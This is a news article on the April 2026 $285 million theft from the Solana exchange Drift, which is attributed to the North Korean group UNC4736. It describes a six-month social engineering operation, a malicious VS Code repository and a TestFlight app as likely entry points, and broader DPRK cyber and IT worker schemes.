$285 Million Drift Hack Traced to Six-Month DPRK Social Engineering Scheme
In a major cybersecurity incident, Drift has revealed that a breach occurring on April 1, 2026, led to the theft of $285 million. This attack was the result of a carefully orchestrated social engineering operation linked to the Democratic People’s Republic of Korea (DPRK). The operation, which began in the fall of 2025, underscores the evolving tactics of state-sponsored hacking groups.
Drift, a decentralized exchange operating on the Solana blockchain, described the incident as “an attack six months in the making.” The company has attributed the breach to a North Korean hacking group known as UNC4736, which operates under various aliases such as AppleJeus, Citrine Sleet, Golden Chollima, and Gleaming Pisces. This group has a documented history of targeting the cryptocurrency sector for financial gain, with activities traced back to at least 2018.
The Background of UNC4736
UNC4736 is notorious for its involvement in high-profile cyberattacks, including the X_TRADER/3CX supply chain breach in 2023 and the $53 million hack of the decentralized finance platform Radiant Capital in October 2024. Drift’s analysis indicates that the financial flows from the recent attack can be traced back to the same group responsible for the Radiant Capital incident, suggesting a continuity in operational tactics.
In a report published in late January 2026, cybersecurity firm CrowdStrike identified Golden Chollima as an offshoot of Labyrinth Chollima, primarily focused on cryptocurrency theft. This group has targeted smaller fintech firms across the U.S., Canada, South Korea, India, and Western Europe. CrowdStrike noted that such operations are crucial for generating revenue for the DPRK regime, especially as the country seeks to fund military ambitions, including the construction of new naval vessels and nuclear submarines.
The Mechanics of the Drift Attack
Drift is currently working with law enforcement and forensic experts to reconstruct the sequence of events leading to the breach. The company characterized the attack as a “structured intelligence operation” that required extensive planning.
Starting in the fall of 2025, individuals posing as representatives of a quantitative trading firm approached Drift contributors at various cryptocurrency conferences. These interactions were part of a deliberate strategy to build rapport with specific individuals over a six-month period. Drift clarified that the individuals who engaged with their contributors were not North Korean nationals but intermediaries employed by DPRK operatives.
These intermediaries were technically proficient and presented verifiable professional backgrounds. A Telegram group was established following initial meetings, leading to months of discussions surrounding trading strategies and potential integrations with Drift’s ecosystem.
Between December 2025 and January 2026, the group successfully onboarded an Ecosystem Vault on Drift, depositing over $1 million of their own funds. This move was strategically designed to create a legitimate operational presence within Drift’s ecosystem, facilitating ongoing conversations about integration. However, it is suspected that these interactions may have served as an initial infection vector, as the Telegram chats and any malicious software used were deleted around the time of the attack.
Attack Vectors and Techniques
The investigation has identified two primary attack vectors. One contributor may have been compromised after cloning a code repository shared by the group, while another was persuaded to download a wallet product via Apple’s TestFlight for beta testing.
The repository-based intrusion likely involved a malicious Microsoft Visual Studio Code (VS Code) project that exploited the “tasks.json” file to execute malicious code automatically when the project was opened in the IDE. This technique has been associated with North Korean threat actors since December 2025, prompting Microsoft to implement new security controls in subsequent VS Code updates.
Drift’s investigation revealed that the profiles used in this operation were meticulously crafted, complete with employment histories and professional networks. The individuals encountered by Drift contributors had spent considerable time building these profiles to withstand scrutiny during business interactions.
The Fragmented Malware Ecosystem of North Korea
Recent disclosures from DomainTools Investigations indicate that the DPRK’s cyber apparatus has evolved into a “deliberately fragmented” malware ecosystem. This shift is believed to be a response to intensified law enforcement actions and intelligence disclosures regarding North Korean hacking campaigns.
The compartmentalization of malware development and operations ensures that exposure in one area does not compromise the entire program. This model complicates attribution efforts and slows down defenders’ decision-making processes.
DomainTools noted that the DPRK’s espionage-oriented malware is primarily associated with Kimsuky, while the Lazarus Group focuses on generating illicit revenue for the regime. A third track involves deploying ransomware and wiper malware for strategic signaling.
Social Engineering Tactics and Broader Implications
Social engineering remains a critical factor in many intrusions attributed to DPRK threat actors. This includes the recent compromise of the popular npm package Axios and ongoing campaigns like Contagious Interview and IT worker fraud.
The Contagious Interview campaign involves adversaries tricking targets into executing malicious code from fake repositories. Meanwhile, DPRK IT worker fraud refers to coordinated efforts to secure remote freelance and full-time roles at Western companies using stolen identities and falsified credentials.
These state-sponsored programs deploy thousands of skilled workers in countries like China and Russia, who connect to company-issued laptops hosted in the U.S. and elsewhere. The scheme relies on a network of facilitators to manage logistics and payroll, further complicating attribution efforts.
As highlighted by Chainalysis, cryptocurrency plays a central role in funneling wages generated by these IT worker schemes back to North Korea, allowing the regime to evade international sanctions. The DPRK’s approach to cyber operations is not merely about financial gain; it reflects a broader strategy to infiltrate critical sectors, including defense contractors and financial institutions. The recruitment of skilled developers from various countries into this infrastructure underscores the regime’s commitment to enhancing its cyber capabilities.
For further details on the Drift hack and its implications, refer to the original reporting source: cyberwarriorsmiddleeast.com.
For ongoing coverage and breaking updates, visit our Latest News section.
Published on 2026-04-05 22:25:00 • By the Editorial Desk
